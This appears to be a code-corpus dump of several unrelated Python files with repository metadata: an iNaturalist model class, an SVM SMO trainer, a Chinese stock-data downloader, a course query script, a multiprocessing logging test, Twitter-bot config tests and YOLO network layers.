class ObservationFieldValue(BaseModel):
"""A dataclass containing information about an observation field **value**, matching the schema of ``ofvs``
from `GET /observations <https://api.inaturalist.org/v1/docs/#!/Observations/get_observations>`_.
"""
datatype: str = kwarg # Enum
field_id: int = kwarg
id: int = kwarg
name: str = kwarg
taxon_id: int = kwarg
user_id: int = kwarg
uuid: str = kwarg
value: OFVValue = kwarg
# Lazy-loaded nested model objects
taxon: property = LazyProperty(Taxon.from_json)
user: property = LazyProperty(User.from_json)
    # Unused attributes
# name_ci: str = kwarg
# value_ci: int = kwarg
# Convert value by datatype
def __attrs_post_init__(self):
if self.datatype in OFV_DATATYPES and self.value is not None:
converter = OFV_DATATYPES[self.datatype]
self.value = converter(self.value)
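# Illustrative effect of the conversion above (made-up values): an OFV with
# datatype 'numeric' and raw value '3.5' ends up holding the float 3.5 (via
# try_int_or_float), while datatype 'taxon' with raw value '48662' becomes
# the int 48662. Datatypes outside OFV_DATATYPES are left as raw strings.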
| UTF-8 | Python | false | false | 2,182 | py | 32 | observation_field.py | 24 | 0.670486 | 0.670027 | 0 | 76 | 27.710526 | 111 |
boobpoop/SVM | 2,525,440,778,017 | af1541a9c7e660e293daa8ae41f275b29f8be0c2 | 402afeec0807beb709a4e7bcc00ed49965fb459a | /svm/Platt-SMO/Platt-SMO.py | f9e3abea458679a5fd2575f112750be91439b108 | []
| no_license | https://github.com/boobpoop/SVM | 5c0df957bcf37e18d479a700b0c29e4fff44e279 | b4acbaffdbbecac51aa21551672b22fd084047a0 | refs/heads/master | 2020-04-11T02:56:43.176337 | 2018-12-12T09:31:57 | 2018-12-12T09:31:57 | 161,462,284 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import random as rd
import matplotlib.pyplot as plt
import time
FILE_PATH = "testSet.txt"
class Data():
def load_data(self, path):
data_list = open(path, "r").readlines()
self.data = []
self.label = []
for data_line in data_list:
split_data = data_line.strip().split('\t')
self.data.append([float(split_data[0]), float(split_data[1])])
self.label.append(int(split_data[2]))
def list_to_mat(self):
self.data = np.mat(self.data)
self.label = np.mat(self.label).transpose()
return self.data, self.label
# Note that you must pass data about type of numpy.mat to these functions
# ensure data format is correct
class Platt_SMO():
def __init__(self, data, label, C, toler, max_iter):
self.data = data
self.label = label
self.C = C
self.toler = toler
self.max_iter = max_iter
self.b = 0
self.dim1, self.dim2 = data.shape
self.alpha = np.mat(np.zeros((self.dim1, 1)))
self.Ei_cache = np.mat(np.zeros((self.dim1, 2)))
def clip_alpha(self, i, LOW, HIGH):
if self.alpha[i] < LOW:
self.alpha[i] = LOW
elif self.alpha[i] > HIGH:
self.alpha[i] = HIGH
return self.alpha[i]
def calculate_Ei(self, i):
fxi = np.multiply(self.alpha, self.label).T * (self.data * self.data[i].T) + self.b
Ei = fxi - self.label[i]
return Ei
def select_rand_j(self, i):
j = i
while(j == i):
j = int(rd.uniform(0, self.dim1))
return j
def select_j(self, i, Ei):
self.Ei_cache[i] = [1, Ei]
max_delta_E = -1
max_index = -1
non_zero_index_array = np.nonzero(self.Ei_cache[:, 0] > 0)[0]
#print(non_zero_index_array)
if len(non_zero_index_array) > 0:
            for j in non_zero_index_array:  # choose j among cached, updated Ei entries
if j == i:
continue
Ej = self.calculate_Ei(j)
if abs(Ei - Ej) > max_delta_E:
max_delta_E = abs(Ei - Ej)
max_index = j
best_Ej = Ej
return max_index, best_Ej
else:
j = self.select_rand_j(i)
            Ej = self.calculate_Ei(j)
return j, Ej
def update_Ei(self, i):
Ei = self.calculate_Ei(i)
        self.Ei_cache[i] = [1, Ei]  # flag 1 marks the cache entry as valid
def update_alpha(self, i):
Ei = self.calculate_Ei(i)
if (self.label[i] * Ei < -self.toler and self.alpha[i] < self.C) or (self.label[i] * Ei > self.toler and self.alpha[i] > 0):
j, Ej = self.select_j(i, Ei)
alpha_i_old = self.alpha[i].copy()
alpha_j_old = self.alpha[j].copy()
if self.label[i] != self.label[j]:
L = max(0, alpha_j_old - alpha_i_old)
H = min(self.C, self.C + alpha_j_old - alpha_i_old)
else:
L = max(0, alpha_j_old + alpha_i_old - self.C)
H = min(self.C, alpha_j_old + alpha_i_old)
if L == H:
return 0
divisor = self.data[i] * self.data[i].T + self.data[j] * self.data[j].T - 2.0 * self.data[i] * self.data[j].T
if divisor <= 0:
return 0
self.alpha[j] += self.label[j] * (Ei - Ej) / divisor
self.alpha[j] = self.clip_alpha(j, L, H)
self.update_Ei(j)
if abs(self.alpha[j] - alpha_j_old) < 0.00001:
return 0
self.alpha[i] += self.label[i] * self.label[j] * (alpha_j_old - self.alpha[j])
self.update_Ei(i)
bi = self.b - Ei - self.label[i] * (self.data[i] * self.data[i].T) * (self.alpha[i] - alpha_i_old) - self.label[j] * (self.data[i] * self.data[j].T) * (self.alpha[j] - alpha_j_old)
bj = self.b - Ej - self.label[i] * (self.data[i] * self.data[j].T) * (self.alpha[i] - alpha_i_old) - self.label[j] * (self.data[j] * self.data[j].T) * (self.alpha[j] - alpha_j_old)
if (0 < self.alpha[i]) and (self.alpha[i] < self.C):
self.b = bi
elif (0 < self.alpha[j]) and (self.alpha[j] < self.C):
self.b = bj
else:
self.b = (bi + bj) / 2.0
return 1
else:
return 0
def SMO(self):
iter = 0
travel_all_data = True
alpha_is_changed = False
while(iter < self.max_iter) and (alpha_is_changed or travel_all_data):
alpha_is_changed = False
if travel_all_data:
for i in range(self.dim1):
alpha_is_changed += self.update_alpha(i)
#print("iter = %d, i = %d, alpha_is_changed = %d" %(iter, i, alpha_is_changed))
iter += 1
else:
non_zero_index_array = np.nonzero(np.multiply((self.alpha > 0), (self.alpha < self.C)))[0]
#print(non_zero_index_array)
for i in non_zero_index_array:
alpha_is_changed += self.update_alpha(i)
#print("iter = %d, i = %d, alpha_is_changed = %d" %(iter, i , alpha_is_changed))
iter += 1
if travel_all_data:
travel_all_data = False
elif not alpha_is_changed:
travel_all_data = True
print("iter = %d" %(iter))
return self.alpha, self.b
def visualize(self):
xcord_1 = []
ycord_1 = []
xcord1 = []
ycord1 = []
for i in range(self.dim1):
if self.label[i] == -1:
xcord_1.append(self.data[i, 0])
ycord_1.append(self.data[i, 1])
else:
xcord1.append(self.data[i, 0])
ycord1.append(self.data[i, 1])
plt.switch_backend("agg")
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(xcord_1, ycord_1, s = 30, c = "red", marker = "o", alpha = 1, label = "-1")
ax.scatter(xcord1, ycord1, s = 30, c = "blue", marker = "+", alpha = 1, label = "1")
weight_matrix = np.multiply(np.tile(np.multiply(self.alpha, self.label) , (1, self.dim2)), self.data)
weight = weight_matrix.sum(axis = 0).tolist()[0]
        print(weight)
        print(self.b)
        x = np.arange(2.0, 8.0, 0.1)
        y = -(weight[0] * x + float(self.b)) / weight[1]
ax.plot(x, y)
ax.set_xlabel("x1")
ax.set_ylabel("x2")
plt.legend()
plt.savefig("data_visualize2.png")
plt.close()
if __name__ == "__main__":
start = time.time()
data = Data()
data.load_data(FILE_PATH)
data, label = data.list_to_mat()
ps = Platt_SMO(data, label, 0.6, 0.001, 40)
alpha, b = ps.SMO()
ps.visualize()
end = time.time()
print(end - start)
#print(b)
#print(alpha[alpha > 0])
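    # Illustrative post-processing sketch (not part of the original script):
    # the separating hyperplane can be recovered from the multipliers as
    # w = sum_i alpha_i * y_i * x_i, and the support vectors are the rows
    # with alpha_i > 0, e.g.:
    #
    #     w = np.multiply(alpha, label).T * data  # shape (1, n_features)
    #     support_vectors = data[np.nonzero(alpha > 0)[0]]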
| UTF-8 | Python | false | false | 6,959 | py | 5 | Platt-SMO.py | 2 | 0.489438 | 0.475212 | 0 | 186 | 36.413978 | 192 |
CoderDream/Algorithmic-Trading-Tutorial | 2,817,498,592,563 | 68bba440b64655ab783e49ef557349a3860db070 | 2ae09be65f5ac40ace5b11352f9c79d9824b70e8 | /01. Programs/Tutorial 04 CN - Get intraday.py | 574b2d274fa90429775ce85f78d93a3dd1663b68 | []
| no_license | https://github.com/CoderDream/Algorithmic-Trading-Tutorial | 05d49503c327629886fb83ee023e9d16128e9eb3 | 57b6d0c8af0cb6e818fd0dcd6ad89c92a16f6b9a | refs/heads/master | 2020-08-13T21:40:44.725775 | 2019-10-14T16:38:17 | 2019-10-14T16:38:17 | 215,042,112 | 0 | 0 | null | true | 2019-10-14T12:46:26 | 2019-10-14T12:46:26 | 2019-10-06T13:44:43 | 2018-08-30T15:44:40 | 2,161 | 0 | 0 | 0 | null | false | false | import tushare
import pandas
import datetime
import os
def stockPriceIntraday(ticker, folder):
# Step 1. Get intraday data online
intraday = tushare.get_hist_data(ticker, ktype='5')
# Step 2. If the history exists, append
file = folder + '/' + ticker + '.csv'
if os.path.exists(file):
history = pandas.read_csv(file, index_col=0)
        intraday = intraday.append(history)  # DataFrame.append returns a new frame
# Step 3. Inverse based on index
intraday.sort_index(inplace=True)
intraday.index.name = 'timestamp'
# Step 4. Save
intraday.to_csv(file)
print('Intraday for [' + ticker + '] got.')
# Step 1. Get tickers online
tickersRawData = tushare.get_stock_basics()
tickers = tickersRawData.index.tolist()
# Step 2. Save the ticker list to a local file
dateToday = datetime.datetime.today().strftime('%Y%m%d')
file = '../02. Data/00. TickerListCN/TickerList_' + dateToday + '.csv'
tickersRawData.to_csv(file)
print('Tickers saved.')
# Step 3. Get stock price (intraday) for all
for i, ticker in enumerate(tickers):
try:
print('Intraday', i, '/', len(tickers))
stockPriceIntraday(ticker, folder='../02. Data/01. IntradayCN')
    except Exception:
pass
print('Intraday for all stocks got.')
| UTF-8 | Python | false | false | 1,220 | py | 355 | Tutorial 04 CN - Get intraday.py | 2 | 0.668033 | 0.654098 | 0 | 43 | 27.372093 | 71 |
iyashikagoyal/Data-Science | 15,874,199,148,054 | 0b1d97c0bb57ba8531eb4b3ca85776777ef4b5b0 | b05422c89f37121fa5b7acc3198c477375465d97 | /DataCleaningAndAnalysis/query.py | 29dcc22074d436954e3f69c249cdecdb3195efe3 | []
| no_license | https://github.com/iyashikagoyal/Data-Science | f6beea90a2759b06d659a1a0ac698b389b26cb3c | cacf8fe0c16cb05e0ebe6fc9508e29004be7d4b3 | refs/heads/master | 2021-05-02T16:17:54.756621 | 2018-06-27T03:09:13 | 2018-06-27T03:09:13 | 120,672,232 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import sys
class_file = open(sys.argv[1],"r").read()
def q1():
    courseslist = list()
    courses = list()
    count = dict()
    number_of_courses = 0
l1 = class_file.strip().split("\n")
for line in l1:
courseslist.append(line.split("-")[1].strip())
for c in courseslist:
courses.append(c.split("|"))
for course in courses:
for c1 in course:
count[c1] = count.get(c1, 0) + 1
for k in count:
number_of_courses = number_of_courses + 1
return number_of_courses
def q2(prof):
if "," in prof:
prof = prof.split(",")[0].strip().lower()
else:
prof = prof.split()[len(prof.split())-1].strip().lower()
l1 = class_file.strip().split("\n")
for x1 in l1:
prof_course = x1.split("-")
if (prof_course[0].strip() == prof):
c = prof_course[1].strip().split("|")
return ("|".join(c))
def word_jaccard(a,b):
union = set(a.split()).union(set(b.split()))
intersection = set(a.split()).intersection(set(b.split()))
return float(len(intersection)/len(union))
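# Illustrative example: word_jaccard("a b c", "b c d") == 0.5
# (intersection {b, c} has 2 words, union {a, b, c, d} has 4).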
def q3():
l1 = class_file.strip().split("\n")
dct = dict()
professorcourses = dict()
a = 0.0
for line in l1:
course = list()
prof_course = line.split("-")
course = prof_course[1].split("|")
dct[prof_course[0]] = len(course)
for k in dct:
if dct[k]>=5:
for line in l1:
x = line.split("-")
if (k == x[0]):
professorcourses[k] = x[1]
for key1 in professorcourses:
s1 = professorcourses[key1]
for key2 in professorcourses:
s2 = professorcourses[key2]
if not (s1 == s2):
if (a < word_jaccard(s1,s2)):
a = word_jaccard(s1,s2)
prof1 = key1
prof2 = key2
    return (prof1 + " and " + prof2)
print("Number of courses : " + str(q1()))
print(q2(sys.argv[2]))
print(q3())
| UTF-8 | Python | false | false | 2,028 | py | 28 | query.py | 20 | 0.512327 | 0.485207 | 0 | 78 | 25 | 64 |
mainissues/TRACLUS_IMPLEMENTATION | 9,053,791,092,578 | 50ebc0efa37d1def307599857d1263aff154d1e5 | f5983701c7fda9cb56420e8d13343ee2a07a98d5 | /traclus-api/app/api/algorithm_api/base/distance_functions.py | 3156c8be490aada0064c2f8eb6773a74283bc4e0 | [
"MIT"
]
| permissive | https://github.com/mainissues/TRACLUS_IMPLEMENTATION | 03926ea0a06655b6332ecb96f980e7bc3fa3a550 | 9f4443f96a06bddf69854584bc2f53589956bc12 | refs/heads/master | 2023-03-27T14:47:57.677894 | 2022-04-25T14:31:57 | 2022-04-25T14:31:57 | 230,099,474 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import math
# Determine which of the two line segments is longer and which is shorter
def determine_longer_and_shorter_lines(line_a, line_b):
if line_a.length < line_b.length:
return line_b, line_a
else:
return line_a, line_b
def get_total_distance_function(perp_dist_func, angle_dist_func, parrallel_dist_func):
def __dist_func(line_a, line_b, perp_func=perp_dist_func, angle_func=angle_dist_func,
parr_func=parrallel_dist_func):
return perp_func(line_a, line_b) + angle_func(line_a, line_b) + parr_func(line_a, line_b)
return __dist_func
# Compute the perpendicular distance between two line segments
def perpendicular_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
dist_a = shorter_line.start.distance_to_projection_on(longer_line)
dist_b = shorter_line.end.distance_to_projection_on(longer_line)
if dist_a == 0.0 and dist_b == 0.0:
return 0.0
return (dist_a * dist_a + dist_b * dist_b) / (dist_a + dist_b)
def __perpendicular_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
dist_a = longer_line.line.project(shorter_line.start).distance_to(shorter_line.start)
dist_b = longer_line.line.project(shorter_line.end).distance_to(shorter_line.end)
if dist_a == 0.0 and dist_b == 0.0:
return 0.0
else:
return (math.pow(dist_a, 2) + math.pow(dist_b, 2)) / (dist_a + dist_b)
# Compute the angular distance between two line segments
def angular_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
sine_coefficient = shorter_line.sine_of_angle_with(longer_line)
return abs(sine_coefficient * shorter_line.length)
# Parallel (horizontal) distance between two line segments
def parrallel_distance(line_a, line_b):
longer_line, shorter_line = determine_longer_and_shorter_lines(line_a, line_b)
def __func(shorter_line_pt, longer_line_pt):
return shorter_line_pt.distance_from_point_to_projection_on_line_seg(longer_line_pt, longer_line)
return min([longer_line.dist_from_start_to_projection_of(shorter_line.start),
longer_line.dist_from_start_to_projection_of(shorter_line.end),
longer_line.dist_from_end_to_projection_of(shorter_line.start),
longer_line.dist_from_end_to_projection_of(shorter_line.end)])
# Distance to the projection point
def dist_to_projection_point(line, proj):
return min(proj.distance_to(line.start), proj.distance_to(line.end))
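# Minimal sanity check of the weighted perpendicular-distance formula used
# above (standalone arithmetic only; the functions themselves need the
# project's point/line classes, which this sketch does not construct):
#   d_perp = (l1^2 + l2^2) / (l1 + l2)
# so projection distances of 3.0 and 1.0 give (9 + 1) / 4 = 2.5.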
| UTF-8 | Python | false | false | 2,497 | py | 34 | distance_functions.py | 27 | 0.67746 | 0.671648 | 0 | 65 | 36.061538 | 105 |
mikexie360/UTD_CS | 11,063,835,785,286 | e53e9942b96d2ce6c27ccfec37bd7e902045ab1a | 09c976bf8d942bb30e284fff9f76db1845c2aa6a | /UTD_CS_6375/HW5/mlhw5/solution/p4.py | acec6febf9938ab16741e928ede544f5a506aa42 | []
| no_license | https://github.com/mikexie360/UTD_CS | 232d62ca992b43c8f4917f5525fc006fdc7132df | 23f7a6266841f6c25dd649d56060b961343869f7 | refs/heads/master | 2023-04-30T06:40:55.272767 | 2021-05-25T00:48:02 | 2021-05-25T00:48:02 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding:utf-8
import numpy as np
from copy import deepcopy
def import_data(fname):
fh = open(fname,'r')
content = fh.readlines()
fh.close()
X=[];Y=[]
for line in content:
values = line.strip().split(',')
X.append(values[0:-1])
Y.append(values[-1])
X= np.array(X,dtype='float').T
Y= np.array([Y],dtype='float')
# map labels to +- 1
Y = (Y-1.5)*2
return X,Y
class GaussianNaiveBayes:
def fit(self,X,Y):
self.rvX_Y = {}
self.rvY = {}
types = np.unique(Y)
_Y = Y[0]
for y in types:
self.rvY[y]=len(_Y[_Y==y])/float(Y.size)
M,N = X.shape
for i in range(M):
f_i = X[i,:]
for y in types:
selector = _Y==y
data = f_i[selector]
mu=np.mean(data)
sigma = np.sqrt(np.mean( (data-mu)**2 ))
self.rvX_Y[i,y]=(mu,sigma)
return
def predict(self,X):
M,N = X.shape
ret = np.zeros((1,N))
for i in range(N):
x_i=X[:,i]
type_prob = []
for y in self.rvY.keys():
prob = self.rvY[y]
for f in range(M):
mu,sigma=self.rvX_Y[f,y]
prob*=(1.0/(sigma*np.sqrt(2*np.pi)))*np.exp(-0.5*((x_i[f]-mu)/sigma)**2)
type_prob.append((y,prob))
type_prob.sort(key = lambda x:x[1],reverse=True)
ret[0,i]=type_prob[0][0]
return ret
def evaluate(self,X,Y):
tags = self.predict(X)
n_right = np.sum(tags == Y)
accuracy = float(n_right)/Y.size
return accuracy
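# The per-feature likelihood computed in predict() above is the Gaussian
# class-conditional density
#   p(x_f | y) = 1 / (sigma * sqrt(2 * pi)) * exp(-(x_f - mu)^2 / (2 * sigma^2))
# and each class is scored by P(y) * prod_f p(x_f | y); predict() keeps the
# argmax over classes y.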
if __name__ == '__main__':
X_tr,Y_tr = import_data('../sonar_train.data')
X_vd,Y_vd = import_data('../sonar_valid.data')
X_ts,Y_ts = import_data('../sonar_test.data')
    gnb = GaussianNaiveBayes()
gnb.fit(X_tr,Y_tr)
print(gnb.evaluate(X_ts,Y_ts)) | UTF-8 | Python | false | false | 1,585 | py | 216 | p4.py | 190 | 0.58612 | 0.572871 | 0 | 69 | 21.985507 | 77 |
brl1906/twitterbot-dgs | 12,506,944,811,267 | e67bcb10cd2861a51371b8d989601550b8c1afe5 | b70591c38af95bb94e0c431fba0657e2d2122b94 | /tests/test_data.py | 4531726cb1dca1bba03de0e0d2216a3c671ab77f | []
| no_license | https://github.com/brl1906/twitterbot-dgs | 7f1afda7386038af7f6df12b507587c25574e5c2 | f6f4aff6b28f1aee7f3cafabde1b6962a10b7e96 | refs/heads/master | 2020-04-27T03:50:06.605750 | 2019-06-06T02:04:06 | 2019-06-06T02:04:06 | 146,484,249 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from configparser import ConfigParser
import os
import unittest
import data_handler
import pandas as pd
class TestConfigFileExistence(unittest.TestCase):
def setUp(self):
self.file = os.path.join(os.pardir, 'configuration', 'config.ini')
self.config = ConfigParser()
self.config.read(self.file)
self.section_names = ['api_key','api_secret','access_token',
'token_secret','datadotworld', 'data_files']
def tearDown(self):
pass
def test_configfile_existence(self):
self.assertEqual(os.path.join(os.pardir, 'configuration', 'config.ini'),
self.file)
def test_configfile_sections(self):
self.assertEqual(self.config.sections(), self.section_names)
class TestDataRetrieval(unittest.TestCase):
def setUp(self):
self.file = os.path.join(os.pardir, 'configuration', 'config.ini')
self.config = ConfigParser()
self.config.read(self.file)
self.sections = self.config.sections()
self.raw_data = data_handler.get_data(self.config.get(section='datadotworld',
option='key'), self.config.get(section='datadotworld',
option='data_name'))
    def tearDown(self):
pass
def test_get_data_function_return(self):
        self.assertIsInstance(self.raw_data, pd.DataFrame)
def test_clean_data_function_return(self):
        self.assertIsInstance(data_handler.clean_data(self.raw_data), pd.DataFrame)
# test that dataframe function returns certain basic columns
if __name__ == '__main__':
unittest.main()
| UTF-8 | Python | false | false | 1,689 | py | 8 | test_data.py | 6 | 0.629959 | 0.629959 | 0 | 56 | 29.160714 | 85 |
Bierkaai/python-mp-preprocessor-old | 11,441,792,923,911 | 3086725164617de92d4ec93a0170ea69e6cd44df | f449847dd1f93d28448e6d7699e04f709c463269 | /enhancedmp/toytest.py | b1c54d3037da3ad5cd45f01175cb5408aae2bd3b | [
"MIT"
]
| permissive | https://github.com/Bierkaai/python-mp-preprocessor-old | e76b9683c1c1477979878d36543867e7c74a33b8 | 61717acf74da7e4bb373d5922c1b2e1d3795e634 | refs/heads/master | 2020-05-03T03:33:51.205803 | 2014-09-30T08:03:36 | 2014-09-30T08:03:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | __author__ = 'coen'
import sys
import time
import random
from enhancedprocessors import *
from multiprocessing import Pipe
from stoppablemultiprocessing import Message, STOP
class RandomLogger(StoppableLoggingProcess):
def __init__(self, logqueue, message_conn, name):
super(RandomLogger, self).__init__(logqueue, message_conn, name)
random.seed()
def process(self):
time.sleep(random.randint(0,5))
self.debug("Slept a while. Woke up")
time.sleep(random.randint(0,5))
self.debug("Going back to sleep...")
if __name__ == "__main__":
logqueue, logger, logger_connection = setuplogging("logfile.log", FULLDEBUG)
sleepers = []
connections = []
for x in range(4):
to_process, to_me = Pipe()
connections.append(to_me)
sleeper = RandomLogger(logqueue, to_process, "Sleeper {0}".format(x))
sleepers.append(sleeper)
logqueue.put(LogMessage(DEBUG, "TEST"))
logger.start()
time.sleep(5)
for s in sleepers:
s.start()
time.sleep(20)
for c in connections:
c.send(Message(STOP))
for s in sleepers:
s.join()
time.sleep(10)
logger_connection.send(Message(STOP))
logger.join()
| UTF-8 | Python | false | false | 1,249 | py | 7 | toytest.py | 6 | 0.629303 | 0.620496 | 0 | 57 | 20.859649 | 80 |
arjonatorres/alarma | 15,315,853,420,704 | 6ef4dc09a1fdf7e271d799d89de9550901b3407e | 0601dae2296d36728c57d940de89d49a7fab444a | /home/pertest.py | 3c94407affcf9783d7afcb47a6b87551061dc7db | []
| no_license | https://github.com/arjonatorres/alarma | 50efa583616424ea12e3aab48d79875f90a9e513 | 6758f483e49e638510abf15889b4fc15a9bf078a | refs/heads/master | 2021-04-28T02:53:42.583834 | 2021-02-03T14:51:37 | 2021-02-03T14:51:37 | 122,125,985 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import serial
import time
ser = serial.Serial('/dev/ttyUSB0',9600,bytesize=8,parity='N',stopbits=1,timeout=1)
#ser.close()
#ser.open()
time.sleep(0.25)
ser.setRTS(True)
time.sleep(0.03)
ser.write("\x14\x6A")
time.sleep(0.03)
ser.flushInput()
ser.setRTS(False)
state=ser.read(8)
time.sleep(0.1)
print state.encode('hex')
ser.close()
#if len(state.encode('hex')) == 20:
# if ((str(state.encode('hex'))[len(state.encode('hex'))-16$
# dato1 = (str(state.encode('hex'))[len(state.encod$
# dato2 = (str(state.encode('hex'))[len(state.encod$
# dato = dato1 + dato2
# else:
# dato = "Error"
# return dato
#else:
# dato = "En movimiento"
# return dato
| UTF-8 | Python | false | false | 743 | py | 116 | pertest.py | 107 | 0.58681 | 0.545087 | 0.002692 | 31 | 22.935484 | 83 |
mdrago98/Seal-Counting | 5,686,536,715,779 | 77fff26c1272356fb6791765cddf2686cc0d4ccc | ac1a76db0627dbc797898bc991915f614c5e9bd0 | /yolo/layers.py | 03593c278991d94b7c631664badd6ac62b4d94df | []
| no_license | https://github.com/mdrago98/Seal-Counting | d529dbbfce4f5111ee865d46a67e59cfda3d8f9a | 03d4b5cf8f21a8d1817e34e3e94db3091e32c7ef | refs/heads/master | 2022-12-12T16:01:40.123786 | 2020-08-25T14:01:24 | 2020-08-25T14:01:24 | 274,442,444 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from tensorflow.keras.layers import (
Add,
Concatenate,
Conv2D,
Input,
Lambda,
LeakyReLU,
UpSampling2D,
ZeroPadding2D,
BatchNormalization,
)
from tensorflow.keras.regularizers import l2
from tensorflow.python.keras.models import Model
import tensorflow as tf
import numpy as np
def darknet_conv(x, filters, size, strides=1, batch_norm=True):
"""
    Declares a Darknet convolution block.
:param x: the input
:param filters: the number of filters
:param size: the size of a filter
:param strides: the number of strides
    :param batch_norm: True iff batch normalisation is to be applied
:return: the transformed input
"""
if strides == 1:
padding = "same"
else:
x = ZeroPadding2D(((1, 0), (1, 0)))(x) # top left half-padding
padding = "valid"
x = Conv2D(
filters=filters,
kernel_size=size,
strides=strides,
padding=padding,
use_bias=not batch_norm,
kernel_regularizer=l2(0.0005),
)(x)
if batch_norm:
x = BatchNormalization()(x)
x = LeakyReLU(alpha=0.1)(x)
return x
def darknet_res(x, filters):
"""
Defines the darknet residual block
:param x: the input
:param filters: the number of filters
:return: the transformed residual
"""
prev = x
x = darknet_conv(x, filters // 2, 1)
x = darknet_conv(x, filters, 3)
x = Add()([prev, x])
return x
def blocking_convolution(x, filters, blocks):
x = darknet_conv(x, filters, 3, strides=2)
for _ in range(blocks):
x = darknet_res(x, filters)
return x
def out_conv(filters, name=None):
"""
Declares the output convolution
:param filters: the number of filters
:param name: the name
:return: the output conv function
"""
def yolo_conv(x_in):
if isinstance(x_in, tuple):
inputs = Input(x_in[0].shape[1:]), Input(x_in[1].shape[1:])
x, x_skip = inputs
# concatenate with skip
x = darknet_conv(x, filters, 1)
x = UpSampling2D(2)(x)
x = Concatenate()([x, x_skip])
else:
x = inputs = Input(x_in.shape[1:])
x = darknet_conv(x, filters, 1)
x = darknet_conv(x, filters * 2, 3)
x = darknet_conv(x, filters, 1)
x = darknet_conv(x, filters * 2, 3)
x = darknet_conv(x, filters, 1)
return Model(inputs, x, name=name)(x_in)
return yolo_conv
def yolt_block(x, filters):
x = darknet_conv(x, filters, 3)
# prev = x
x = darknet_conv(x, filters // 2, 1)
x = darknet_conv(x, filters, 3)
# x = Add()([prev, x])
return x
def yolo_boxes(pred: tf.Tensor, anchors: np.array, classes: int) -> tuple:
"""
    A function to decode the yolo output into bounding boxes, objectness confidence, class probabilities and the raw predicted boxes
:param pred: the prediction tensor in the shape (batch_size, grid, grid, anchors, (x, y, w, h, obj, ...classes))
:param anchors: the anchors of the relevant scale
:param classes: the number of classes
:return: a tuple of bbox, objectness, class_probs, pred_box
"""
# pred: (batch_size, grid, grid, anchors, (x, y, w, h, obj, ...classes))
grid_size = tf.shape(pred)[1:3]
box_xy, box_wh, objectness, class_probs = tf.split(pred, (2, 2, 1, classes), axis=-1)
box_xy = tf.sigmoid(box_xy)
objectness = tf.sigmoid(objectness)
class_probs = tf.sigmoid(class_probs)
pred_box = tf.concat((box_xy, box_wh), axis=-1) # original xywh for loss
# !!! grid[x][y] == (y, x)
grid = tf.meshgrid(tf.range(grid_size[1]), tf.range(grid_size[0]))
grid = tf.expand_dims(tf.stack(grid, axis=-1), axis=2) # [gx, gy, 1, 2]
box_xy = (box_xy + tf.cast(grid, tf.float32)) / tf.cast(grid_size, tf.float32)
box_wh = tf.exp(box_wh) * anchors
box_x1y1 = box_xy - box_wh / 2
box_x2y2 = box_xy + box_wh / 2
bbox = tf.concat([box_x1y1, box_x2y2], axis=-1)
return bbox, objectness, class_probs, pred_box
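# Illustrative decoding of a single scale with made-up shapes (13x13 grid on
# a 416px input, 3 anchors, 2 classes; anchor sizes borrowed from the usual
# YOLOv3 config) -- a sketch, not part of the model definition:
#
#     pred = tf.random.uniform((1, 13, 13, 3, 5 + 2))
#     anchors_13 = np.array([(116, 90), (156, 198), (373, 326)], np.float32) / 416
#     bbox, obj, probs, raw = yolo_boxes(pred, anchors_13, classes=2)
#     # bbox: (1, 13, 13, 3, 4) holding normalised (x1, y1, x2, y2)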
def yolo_out(filters, anchors: np.array, classes, name=None):
"""
Defines the yolo output convolutions
:param filters: the number of filters
:param anchors: the anchors
:param classes: the number of classes
:param name: the name of the block
:return: the transformed yolo output kernel
"""
def yolo_output(x_in):
x = inputs = Input(x_in.shape[1:])
x = darknet_conv(x, filters * 2, 3)
x = darknet_conv(x, anchors * (classes + 5), 1, batch_norm=False)
x = Lambda(
lambda x: tf.reshape(x, (-1, tf.shape(x)[1], tf.shape(x)[2], anchors, classes + 5))
)(x)
return tf.keras.Model(inputs, x, name=name)(x_in)
return yolo_output
def yolo_nms(
    outputs, anchors, masks, classes, yolo_max_boxes, yolo_iou_threshold, yolo_score_threshold
):
    """
    Flattens the per-scale predictions and applies combined non-max suppression
    :return: a tuple of boxes, scores, classes, valid_detections
    """
    # boxes, confidences, class probabilities collected across scales
    b, c, t = [], [], []
for o in outputs:
b.append(tf.reshape(o[0], (tf.shape(o[0])[0], -1, tf.shape(o[0])[-1])))
c.append(tf.reshape(o[1], (tf.shape(o[1])[0], -1, tf.shape(o[1])[-1])))
t.append(tf.reshape(o[2], (tf.shape(o[2])[0], -1, tf.shape(o[2])[-1])))
bbox = tf.concat(b, axis=1)
confidence = tf.concat(c, axis=1)
class_probs = tf.concat(t, axis=1)
scores = confidence * class_probs
boxes, scores, classes, valid_detections = tf.image.combined_non_max_suppression(
boxes=tf.reshape(bbox, (tf.shape(bbox)[0], -1, 1, 4)),
scores=tf.reshape(scores, (tf.shape(scores)[0], -1, tf.shape(scores)[-1])),
max_output_size_per_class=yolo_max_boxes,
max_total_size=yolo_max_boxes,
iou_threshold=yolo_iou_threshold,
score_threshold=yolo_score_threshold,
)
return boxes, scores, classes, valid_detections
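# A minimal, hedged usage sketch (not part of the original module): decoding one
# 13x13 prediction head. The three anchor sizes and the 80-class count below are
# illustrative assumptions, not this repository's configuration.
if __name__ == "__main__":
    demo_anchors = np.array([(10, 13), (16, 30), (33, 23)], np.float32) / 416  # normalised anchors
    demo_pred = tf.random.uniform((1, 13, 13, 3, 5 + 80))  # (batch, grid, grid, anchors, outputs)
    bbox, objectness, class_probs, raw = yolo_boxes(demo_pred, demo_anchors, classes=80)
    print(bbox.shape)  # -> (1, 13, 13, 3, 4)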
| UTF-8 | Python | false | false | 5,994 | py | 39 | layers.py | 24 | 0.59693 | 0.578078 | 0 | 194 | 29.896907 | 116 |
